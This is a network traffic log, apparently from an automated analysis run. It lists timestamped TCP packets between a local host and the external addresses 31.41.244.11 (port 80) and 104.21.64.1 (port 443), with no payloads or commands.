Dec 14, 2024 23:58:21.060652971 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.060719967 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.060771942 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.061678886 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.061731100 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.061821938 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.061887980 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.062788963 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.062839985 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.062918901 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.062984943 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.063889027 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.063940048 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.064019918 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.064084053 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.064991951 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.065042973 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.065123081 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.065185070 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.066090107 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.066143036 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.066241026 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.066296101 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.067214012 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.067265034 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.067348957 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.067399025 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.068305969 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.068356991 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.068423033 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.068474054 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.069407940 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.069467068 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.069513083 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.069562912 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.070493937 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.070610046 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.070682049 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.070682049 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.071592093 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.071659088 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.071732998 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.071795940 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.072666883 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.072717905 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.072791100 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.072843075 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.073760033 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.073813915 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.073889971 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.073939085 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.074856043 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.074907064 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.074982882 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.075047016 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.075979948 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.076030970 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.076118946 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.076164007 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.077079058 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.077138901 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.077202082 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.077255964 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.078142881 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.078193903 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.078258991 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.078310013 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.079273939 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.079330921 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.079385042 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.079438925 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.080333948 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.080385923 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.080465078 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.080534935 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.081433058 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.081567049 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.081634045 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.082530975 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.082695961 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.082746029 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.083647966 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.083700895 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.083776951 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.083844900 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.084747076 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.084798098 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.084968090 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.085020065 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.085829020 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.085882902 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.085963011 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.086026907 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.086870909 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.086918116 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.221853018 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.221895933 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.222054958 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.222054958 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.222212076 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.222451925 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.222871065 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.223022938 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.223417997 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.223472118 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.223553896 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.223602057 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.224450111 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.224499941 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.224569082 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.224621058 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.225610971 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.225670099 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.225694895 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.225745916 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.226619005 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.226671934 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.226737976 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.226788998 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.227726936 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.227777958 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.227845907 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.227895975 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.228806019 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.228856087 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.228923082 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.228971958 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.229901075 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.229954004 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.230032921 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.230082989 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.231031895 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.231082916 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.231163025 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.231209993 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.232098103 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.232151031 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.232230902 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.232362032 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.233196974 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.233248949 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.233316898 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.233366966 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.234288931 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.234340906 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.234414101 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.234468937 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.235539913 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.235596895 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.235682011 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.235733986 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.236537933 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.236588955 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.236659050 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.236710072 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.237581968 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.237704992 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.237744093 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.237773895 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.238254070 CET	49800	443	192.168.2.4	104.21.64.1
Dec 14, 2024 23:58:21.238338947 CET	443	49800	104.21.64.1	192.168.2.4
Dec 14, 2024 23:58:21.238428116 CET	49800	443	192.168.2.4	104.21.64.1
Dec 14, 2024 23:58:21.238683939 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.238740921 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.238809109 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.238866091 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.238884926 CET	49800	443	192.168.2.4	104.21.64.1
Dec 14, 2024 23:58:21.238961935 CET	443	49800	104.21.64.1	192.168.2.4
Dec 14, 2024 23:58:21.239784002 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.239835978 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.239908934 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.239958048 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.240866899 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.240920067 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.240986109 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.241036892 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.241960049 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.242008924 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.242088079 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.242150068 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.243063927 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.243117094 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.243196964 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.243247986 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.244174004 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.244225025 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.244292021 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.244343042 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.245255947 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.245307922 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.245378017 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.245431900 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.246406078 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.246459961 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.246514082 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.246560097 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.247482061 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.247538090 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.247585058 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.247634888 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.248558998 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.248681068 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.248754978 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.249664068 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.249851942 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.249922037 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.250741005 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.250793934 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.250861883 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.250914097 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.251852036 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.251904964 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.251975060 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.252034903 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.252943039 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.252995968 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.253060102 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.253109932 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.254071951 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.254127979 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.254172087 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.254231930 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.255248070 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.255304098 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.255382061 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.255434990 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.256381989 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.256431103 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.256515980 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.256582022 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.257320881 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.257373095 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.257452011 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.257503033 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.258435011 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.258486986 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.258554935 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.258622885 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.259546995 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.259599924 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.259684086 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.259732008 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.260615110 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.260667086 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.260879040 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.260935068 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.261831045 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.261883974 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.261929035 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.261981964 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.262834072 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.262886047 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.263024092 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.263075113 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.263926029 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.263978004 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.264044046 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.264090061 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.265110970 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.265163898 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.265230894 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.265279055 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.266129017 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.266181946 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.266259909 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.266308069 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.267220020 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.267272949 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.267369032 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.267421961 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.268321037 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.268373013 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.268439054 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.268490076 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.269414902 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.269469976 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.269541025 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.269591093 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.270499945 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.270551920 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.270623922 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.270674944 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.271588087 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.271653891 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.271722078 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.271796942 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.272696018 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.272762060 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.272819996 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.272871017 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.273794889 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.273859978 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.273926020 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.273991108 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.274878979 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.274930954 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.275063038 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.275110960 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.275999069 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.276056051 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.276124954 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.276177883 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.277085066 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.277137041 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.277215958 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.277266979 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.278188944 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.278258085 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.278325081 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.278389931 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.279257059 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.279309034 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.414196968 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.414278984 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.414309025 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.414362907 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.414664030 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.414730072 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.414838076 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.414915085 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.415734053 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.415786982 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.415910006 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.415961981 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.416896105 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.416950941 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.417033911 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.417097092 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.417941093 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.417999983 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.418067932 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.418123007 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.419080973 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.419137955 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.419207096 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.419258118 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.420391083 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.420443058 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.420545101 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.420598030 CET	49793	80	192.168.2.4	31.41.244.11
